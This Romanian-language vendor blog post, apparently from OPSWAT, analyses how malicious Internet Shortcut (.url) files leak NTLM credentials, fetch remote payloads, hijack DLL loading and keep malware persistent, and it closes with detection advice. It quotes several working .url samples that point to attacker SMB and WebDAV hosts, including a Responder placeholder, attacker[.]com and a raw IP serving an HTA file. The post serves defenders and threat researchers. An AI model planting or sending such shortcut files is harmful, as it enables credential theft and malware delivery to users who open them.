Shortcut to Malice, Partea 3: Analiza comportamentală a fișierelor URL utilizând MetaDefender Sandbox

În timp ce inspecția statică dezvăluie ce conține un fișier, analiza dinamică ne spune ce face acesta. Atunci când vine vorba de fișierele Internet Shortcut (.url), această distincție este vitală. Aparent inofensive pe disc, aceste fișiere acționează adesea ca puncte de declanșare în campanii malware în mai multe etape - executând sarcini utile la distanță, furând acreditări sau permițând persistența.

În acest al treilea și ultimul episod al seriei noastre privind amenințările fișierelor URL, ne concentrăm asupra comportamentului dinamic: cum funcționează fișierele .url în lumea reală și ce activitate post-execuție dezvăluie acestea. Această perspectivă comportamentală este examinată cel mai bine prin intermediul MetaDefender Sandbox, mediul OPSWATde detonare a programelor malware care emulează interacțiunea utilizatorului final și descoperă căi de execuție pe care scanarea statică nu le poate detecta.

Puteți vizualiza cele două bloguri anterioare selectând din opțiunile de mai jos:

• Partea 1: Shortcut to Malice: De ce fișierele URL sunt din nou în centrul atenției cu privire la amenințările cibernetice
• Partea 2: Shortcut to Malice: Analiza statică a fișierelor URL malițioase și tehnica din spatele acestora

Analiza statică semnalează formatarea suspectă, dar MetaDefender Sandbox captează comportamentele în timpul rulării care indică un compromis real, cum ar fi:

• interogări DNS sau conexiuni HTTP de ieșire către infrastructura atacatorului
• Invocarea de componente Windows (de exemplu, mshta.exe, wscript.exe) pentru a lansa sarcini utile
• Scrierea fișierelor în locațiile de pornire automată sau în Registrul Windows
• Încercări de autentificare SMB care scurg acreditările NTLM
• Comunicații WebDAV de rezervă prin HTTP/80 după încercări SMB eșuate

O altă contribuție la imaginea de ansamblu a abuzului de fișiere URL a avut loc în 2018, iar de data aceasta se referă la scurgerea de informații și la potențialul fișierelor URL de a juca un rol în capturarea materialului de autentificare și a credențialelor de către atacatorii de la distanță. 

În mai, Securify au remarcat mai multe moduri în care subsistemele Windows pot fi păcălite să trimită acreditările NTLM ale unui utilizator către o gazdă controlată de atacator. Aceștia au dezvăluit două metode care utilizează fișiere URL, cum ar fi această metodă simplă prin simpla utilizare a file:// pentru a face trimitere la un fișier de la distanță: 

[InternetShortcut] 

URL=file://<responder ip>/leak/leak.html

...precum și acest exemplu, utilizând opțiunea IconFile pentru a declanșa manipulatorul URL pentru a prelua un fișier pictogramă de la distanță pentru extragerea unei imagini de redat:

[InternetShortcut] 

URL=https://securify.nl 

IconIndex=0 

IconFile=\\<responder ip>\leak\leak.ico

În cazul celui de-al doilea, devine clar că există multe elemente de îngrijorare, inclusiv opționalitatea unui prefix de protocol, utilizarea interschimbabilă a liniuțelor înainte sau înapoi și persistența generală a SMB ca un canal neintenționat de ridicare a privilegiilor prin accesul riscant la infrastructura atacatorului converg în ceea ce este o suprafață de atac comună în sistemul de operare.

Aceeași abordare de utilizare a opțiunii IconFile pentru accesul la acreditări a fost discutată și de Alex Inführ ulterior. După cum s-a menționat, atunci când aceste fișiere URL sunt activate, sunt inițiate conexiuni SMB la serverele de la distanță, ceea ce duce la schimbul de autentificare și la divulgarea către atacator a datelor privind acreditările NTLM. Setul de instrumente adversar comun utilizat la capătul îndepărtat al acestor tipuri de atacuri de către numeroși actori de amenințare este Responder.

Un alt aspect al potențialului de abuz al fișierelor URL a fost dezvăluit de Inführ în discuția privind utilizarea abuzivă a câmpurilor din fișiere pentru a executa coduri necontrolate prin încărcarea laterală a DLL. În această dovadă a conceptului, un fișier URL este utilizat pentru a indica un fișier executabil local care este vulnerabil la deturnarea căii de căutare DLL; la activarea fișierului URL, opțiunea WorkingDirectory este procesată, ceea ce duce la stabilirea căii de căutare pentru DLL încărcate pentru a include un director controlat de atacator pe o partajare SMB la distanță.

[InternetShortcut]
URL=C:\windows\...\mscorsvw.exe
WorkingDirectory=\attacker[.]com\SMBShare\

După cum s-a documentat în campaniile malware, cum ar fi analiza efectuată de Zscaler ThreatLabz cu privire la DBatLoader utilizat pentru distribuirea RAT-urilor Remcos și Formbook, fișierele URL sunt fișiere de scurtătură care pot fi, de asemenea, utilizate pentru executarea pe un sistem.  

Atunci când sunt legate de locațiile de pornire automată, aceste fișiere suportă, de asemenea, un mijloc de persistență pentru a permite malware-ului să se execute după repornire sau autentificare. Următorul fișier URL a fost utilizat în cazul acestei campanii de distribuție, permițând pornirea încărcăturii malware în Xdfiifag.exe.

[InternetShortcut]
URL=file:"C:\\Users\\Public\\Libraries\\Xdfiifag.exe"
IconIndex=13
HotKey=49

În iunie 2023, @AnFam17 a împărtășit informații despre un redirecționator de trafic de destinație bazat pe inginerie socială care distribuie utilizatorilor sarcini ale RAT NetSupport, din nou în special prin fișiere URL. Paginile de destinație bazate pe inginerie socială din amonte erau legate de un kit cunoscut sub numele de FakeSG. Exemplu de fișier URL(Install Updater (msi-stable(V102.84.3348).url): 

[InternetShortcut]
URL=file:\\94.158.247.6@80\Downloads\updatermsi.hta
ShowCommand=7
IconIndex=247
IconFile=C:\Windows\System32\shell32.dll

Acest fișier URL ilustrează, ca și iterațiile anterioare, faptul că file:// prefixul protocolului poate fi reprezentat cu un nivel ridicat de flexibilitate, în cazul de față folosind backslashes mai degrabă decât forward slashes, și subliniind un aspect care poate fi o provocare pentru inginerii de detectare.

Este demn de remarcat aici că, la fel ca în cazul fișierelor URL menționate anterior care utilizează prefixe de fișier, există o inconsecvență inerentă. În cazul acestor URL-uri, atacatorul găzduiește sarcinile utile pe un server WebDAV, ceea ce duce la recuperarea conținutului nu prin SMB, ci prin HTTP utilizând protocolul WebDAV pe portul 80/tcp.

Un alt exemplu notabil în legătură cu acest subiect a avut loc în jurul dezvăluirii unei alte vulnerabilități de profil înalt, CVE-2023-36884, dezvăluită public în iulie 2023. La momentul respectiv, era vorba de o vulnerabilitate de tip 0-day care fusese raportată ca fiind utilizată în campanii de atac direcționate, utilizată de un grup de amenințări pentru distribuirea unei variante modificate a RomCom RAT.  

Lanțul de amenințări complex, în mai multe etape, a readus în atenție subiectul gestionării fișierelor URL și a scos la suprafață observații privind executarea de cod de la distanță fără verificare atunci când o sarcină utilă este încărcată dintr-o cale de arhivă ZIP accesată prin WebDAV. 

Cu această retrospectivă în spațiul de abuz al scurtăturilor Internet (fișiere URL), putem vedea că, pentru o perioadă de câțiva ani, acestea au jucat un rol în peisajul amenințărilor, deși un rol secundar și rareori vedeta principală a spectacolului. Adesea, tehnologiile de activare și ocolirea caracteristicilor de securitate sunt clasificate drept vulnerabilități de gravitate redusă și, uneori, sunt chiar ignorate ca erori nesecuritate, neajungând la nivelul de acceptare CVE de către furnizori.

De multe ori, în calitate de analiști ai amenințărilor, acordăm prioritate celui mai evident vinovat în secvențele de amenințări, punând cel mai mare accent pe sarcinile utile finale și pe modul în care atacatorii acționează asupra obiectivului. Cu toate acestea, este important să reținem că adversarii de astăzi au ajuns să realizeze că costurile crescute din reducerea suprafeței de atac pot fi acoperite prin operațiuni din ce în ce mai complexe bazate pe fișiere, iar secvențele de atac care utilizează fișiere URL sunt adesea un bun indicator al utilizării lor în astfel de lanțuri de atacuri.

OPSWAT recomandă organizațiilor să își mențină atenția în acest domeniu al operațiunilor complexe și multistratificate bazate pe fișiere.

• Monitorizați încercările de acces la fișiere URL la distanță. Organizațiile pot considera fezabil să blocheze accesul la fișiere URL găzduite la distanță.
• Analizați și inspectați țintele din fișierele URL întâlnite în mediu, căutându-le pe cele care abuzează de caracteristicile protocoalelor bazate pe file://, pe cele care fac referire la căile externe SMB sau WebDAV și alte anomalii în câmpurile URL, IconFile și WorkingDirectory
• Monitorizați și validați sesiunile SMB și WebDAV de ieșire cu o infrastructură externă, neîncrezătoare. Rețineți că o serie de servicii și soluții de stocare în cloud care acceptă WebDAV sunt disponibile și au fost utilizate în mod abuziv în campanii de amenințare, inclusiv 4shared, DriveHQ și OpenDrive. Aceste servicii oferă atacatorilor servicii disponibile public și neatribuibile care pot fi exploatate în țintirea potențialelor victime.
• Blocați conexiunile la serviciile SMB externe. Anii de activitate asociată amenințărilor au arătat că aceasta este o sursă continuă de durere pentru scurgerea de informații, executarea de cod de la distanță și riscuri conexe. Atacurile viitoare vor continua probabil să folosească acest tip de tactici, în special împotriva versiunilor vechi ale sistemelor de operare, iar astfel de controale pot ajuta la detectarea și întreruperea amenințărilor necunoscute în aceste cazuri.
• Folosiți tehnologia noastră de ultimă generație Deep File Inspection® și RetroHunt®, pentru a scana mai adânc și a expune mai multe atacuri transmise prin fișiere decât orice altă soluție.

Acest articol a demonstrat modul în care fișierele URL acționează mult mai mult decât simple scurtături: acestea inițiază scurgeri de acreditări, obțin sarcini utile din rețele nesigure, deturnează încărcarea DLL-urilor și chiar persistă malware pe punctele finale.

Singura modalitate de a detecta cu certitudine aceste comportamente este să le observăm - și aici MetaDefender Sandbox oferă informații esențiale. Împreună cu puterea Deep File Inspection și contextul oferit de MetaDefender InSights, organizațiile pot rămâne în fața amenințărilor transmise prin fișiere în fiecare fază a lanțului de distrugere.